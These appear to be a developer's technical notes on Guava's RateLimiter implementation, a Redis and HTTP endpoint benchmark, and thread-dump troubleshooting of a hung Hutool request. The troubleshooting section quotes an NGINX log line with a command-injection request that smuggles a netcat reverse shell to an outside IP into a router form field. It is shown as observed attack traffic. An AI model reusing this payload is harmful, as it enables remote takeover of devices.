Guava RateLimiter

See the RateLimiter source code.

Basic Usage

<dependency>
    <groupId>com.google.guava</groupId>
    <artifactId>guava</artifactId>
</dependency>
RateLimiter rateLimiter = RateLimiter.create(1);
rateLimiter.acquire();

Implementation

The key code of the SmoothBursty limiter is extracted below to walk through the basic flow.

import java.time.Instant;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.locks.LockSupport;

class RateLimiter {

    /**
     * How many seconds' worth of permits may be stored to absorb bursts
     */
    private final double maxBurstSeconds;

    /**
     * Maximum number of permits that can be stored
     */
    private final double maxPermits;

    /**
     * Interval between generating two permits (microseconds)
     */
    private final double stableIntervalMicros;

    /**
     * Number of permits currently stored
     */
    private double storedPermits;

    /**
     * Earliest time at which the next request may acquire permits
     */
    private long nextFreeTicketMicros = 0L;

    /**
     * @param permitsPerSecond number of permits generated per second
     */
    RateLimiter(double permitsPerSecond) {
        this.maxBurstSeconds = 1.0;
        maxPermits = maxBurstSeconds * permitsPerSecond;
        stableIntervalMicros = TimeUnit.SECONDS.toMicros(1L) / permitsPerSecond;
    }

    /**
     * Acquires the given number of permits, blocking until they can be granted;
     * returns the time spent waiting (seconds)
     */
    public double acquire(int permits) {
        // Validate the argument
        if (permits <= 0) {
            throw new IllegalArgumentException(String.format("Requested permits (%s) must be positive", permits));
        }
        long microsToWait;
        // Lock to guarantee thread safety
        synchronized (this) {
            Instant instant = Instant.now();
            long nowMicros = instant.getEpochSecond() * 1_000_000 + instant.getNano() / 1000;
            long momentAvailable = reserveEarliestAvailable(permits, nowMicros);
            microsToWait = Math.max(momentAvailable - nowMicros, 0);
        }
        LockSupport.parkNanos(microsToWait * 1000);
        return 1.0 * microsToWait / TimeUnit.SECONDS.toMicros(1L);
    }

    /**
     * Returns the time at which the current request may take its permits, and updates
     * the stored permit count and the time at which the next request may acquire permits
     */
    final long reserveEarliestAvailable(int requiredPermits, long nowMicros) {
        // If the current time is past nextFreeTicketMicros, refill the stored permits
        // for the elapsed interval and move the earliest-available time up to now
        if (nowMicros > nextFreeTicketMicros) {
            double newPermits = (nowMicros - nextFreeTicketMicros) / stableIntervalMicros;
            storedPermits = Math.min(maxPermits, storedPermits + newPermits);
            nextFreeTicketMicros = nowMicros;
        }
        // The current request is granted at nextFreeTicketMicros
        long returnValue = nextFreeTicketMicros;
        // Spend stored permits first, then charge the wait for any fresh permits
        // that still need to be generated to the *next* request
        double storedPermitsToSpend = Math.min(requiredPermits, this.storedPermits);
        double freshPermits = requiredPermits - storedPermitsToSpend;
        long waitMicros = (long) (freshPermits * stableIntervalMicros);
        // Add the wait to nextFreeTicketMicros, saturating at Long.MAX_VALUE on overflow
        try {
            nextFreeTicketMicros = Math.addExact(nextFreeTicketMicros, waitMicros);
        } catch (ArithmeticException e) {
            nextFreeTicketMicros = Long.MAX_VALUE;
        }
        storedPermits -= storedPermitsToSpend;
        return returnValue;
    }

    public static void main(String[] args) {
        RateLimiter rateLimiter = new RateLimiter(1);
        for (int i = 0; i < 10; i++) {
            double wait = rateLimiter.acquire(2);
            System.out.printf("wait: %fs, stored permits: %f%n", wait, rateLimiter.storedPermits);
        }
    }
}
// The current time is past nextFreeTicket, so maxPermits permits are generated
// Request 2 permits: only 1 is stored, so wait 0 s; the next request must wait 1 s
wait: 0.000000s, stored permits: 0.000000
// Request 2 permits: 0 stored, so wait 1 s; the next request must wait 2 s
wait: 0.967138s, stored permits: 0.000000
// Request 2 permits: 0 stored, so wait 2 s; the next request must also wait 2 s
wait: 1.981604s, stored permits: 0.000000
wait: 1.989831s, stored permits: 0.000000
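The wait pattern above (0 s, then 1 s, then a steady 2 s) can be reproduced deterministically by driving the same bookkeeping with a fake clock instead of Instant.now(). This is a sketch for verification only, not Guava's actual code; FakeClockLimiter and waitMicros are names invented here:

```java
// Minimal re-implementation of reserveEarliestAvailable driven by a fake clock,
// so the wait times from the run above can be checked exactly.
class FakeClockLimiter {
    final double maxPermits;           // burst capacity: 1 second's worth of permits
    final double stableIntervalMicros; // time to mint one permit
    double storedPermits = 0;
    long nextFreeTicketMicros = 0;

    FakeClockLimiter(double permitsPerSecond) {
        this.maxPermits = permitsPerSecond; // maxBurstSeconds = 1.0
        this.stableIntervalMicros = 1_000_000.0 / permitsPerSecond;
    }

    // Returns how long (micros) a request for `permits` arriving at `nowMicros` must wait.
    long waitMicros(int permits, long nowMicros) {
        if (nowMicros > nextFreeTicketMicros) {
            double newPermits = (nowMicros - nextFreeTicketMicros) / stableIntervalMicros;
            storedPermits = Math.min(maxPermits, storedPermits + newPermits);
            nextFreeTicketMicros = nowMicros;
        }
        long momentAvailable = nextFreeTicketMicros;
        double spend = Math.min(permits, storedPermits);
        double fresh = permits - spend;
        nextFreeTicketMicros += (long) (fresh * stableIntervalMicros);
        storedPermits -= spend;
        return Math.max(momentAvailable - nowMicros, 0);
    }

    public static void main(String[] args) {
        FakeClockLimiter limiter = new FakeClockLimiter(1);
        long now = 1_000_000; // pretend the limiter was created 1 s ago, so 1 permit is stored
        for (int i = 0; i < 4; i++) {
            long wait = limiter.waitMicros(2, now);
            System.out.printf("wait: %d us%n", wait);
            now += wait; // the caller sleeps for the wait, so the clock advances by it
        }
    }
}
```

With the clock advancing by each sleep, the printed waits are 0, 1000000, 2000000, 2000000 microseconds, matching the measured 0 s / ~1 s / ~2 s / ~2 s run (the real run is slightly under the round numbers because permits accrue during the actual elapsed time).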

Performance Testing

The server has 2 CPU cores and 2 GB of RAM. Benchmarking the Redis GET command yields 70k+ RPS, yet the application endpoint, which caches its data in Redis, only reaches ~1.3k RPS even when every request hits the cache.

$ lscpu
Architecture: x86_64
CPU(s): 2
CPU MHz: 2499.998

$ free -h
               total        used        free      shared  buff/cache   available
Mem:           1.8Gi       1.3Gi       140Mi       1.0Mi       551Mi       545Mi
Swap:             0B          0B          0B
$ redis-benchmark -t get -c 50 -n 100000 -d 8 -P 1
====== GET ======
100000 requests completed in 1.41 seconds
50 parallel clients
8 bytes payload
keep alive: 1
host configuration "save": 3600 1 300 100 60 10000
host configuration "appendonly": no
multi-thread: no

Summary:
throughput summary: 70972.32 requests per second
latency summary (msec):
        avg       min       p50       p95       p99       max
      0.478     0.144     0.407     0.863     1.183    10.327
$ wrk -t4 -c100 -d30s --latency http://127.0.0.1:8080/predict/biweekly-contest-152/1/25
Running 30s test @ http://127.0.0.1:8080/predict/biweekly-contest-152/1/25
4 threads and 100 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 75.57ms 32.14ms 490.57ms 85.10%
Req/Sec 337.43 69.15 530.00 76.79%
Latency Distribution
50% 71.32ms
75% 85.89ms
90% 103.88ms
99% 201.92ms
40414 requests in 30.11s, 269.38MB read
Requests/sec: 1342.26
Transfer/sec: 8.95MB

Threads were blocked at sun.nio.ch.SocketDispatcher.read0.

Troubleshooting

A scheduled task never completed. Using jps and jstack -l [PID] to inspect thread states, and jstack.review to analyze the dump file, I found the thread-pool threads blocked in a native method. Checking Hutool's documentation then revealed that, with the default configuration, HTTP requests never time out; setting a timeout should fix the problem. (See How to Analyze Java Thread Dumps)

"pool-41-thread-2" #226773 prio=5 os_prio=0 cpu=6566.92ms elapsed=506952.44s tid=0x00007f66ec022640 nid=0x6188f runnable  [0x00007f66f98ea000]
java.lang.Thread.State: RUNNABLE
at sun.nio.ch.SocketDispatcher.read0(java.base@17.0.12/Native Method)
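Hutool's HttpRequest exposes a timeout setter for exactly this. As an illustration of the same fix using only the JDK's built-in client, a sketch (the URL is a placeholder, and TimeoutExample is a name invented here):

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.time.Duration;

public class TimeoutExample {
    public static void main(String[] args) {
        // Connect timeout: bounds how long establishing the TCP connection may take.
        HttpClient client = HttpClient.newBuilder()
                .connectTimeout(Duration.ofSeconds(5))
                .build();
        // Request timeout: bounds how long we wait for the response; without one,
        // a read can block indefinitely inside SocketDispatcher.read0.
        HttpRequest request = HttpRequest.newBuilder(URI.create("https://example.com/api"))
                .timeout(Duration.ofSeconds(10))
                .GET()
                .build();
        // Only the configuration is shown here; no request is actually sent.
        System.out.println(client.connectTimeout().get());
        System.out.println(request.timeout().get());
    }
}
```

The key point carries over to any HTTP client: always set both a connect timeout and a read/request timeout, otherwise a stalled peer pins a pool thread forever.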

Additionally, top -H -p [PID] shows the per-thread states of a process; here they were all in state S. netstat -antp shows TCP connection states. A glance at the NGINX log also turned up quite a few strange requests, presumably attack traffic, though harmless in this case.

196.251.69.180 - - [15/Mar/2025:10:00:32 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+196.251.69.180+61781+%3E%2Ftmp%2Ff%
29 HTTP/1.1" 200 760 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-"

Common Commands

uname -m, whoami, pwd, jobs, ctrl-z + [bg | fg]
wget, scp, tar -xvf [file], curl -X POST [url]
systemctl [start | stop | restart | status] xxx
nohup java -jar xxx.jar > /dev/null 2>&1 &
ps aux | grep xxx, kill [pid]
top -H -p [pid], netstat -antp
jps, jstack -l [pid], jmap -dump:format=b,file=heap.hprof [pid]
jmeter -n -t "xxx.jmx", jmeter -g result.jtl -o result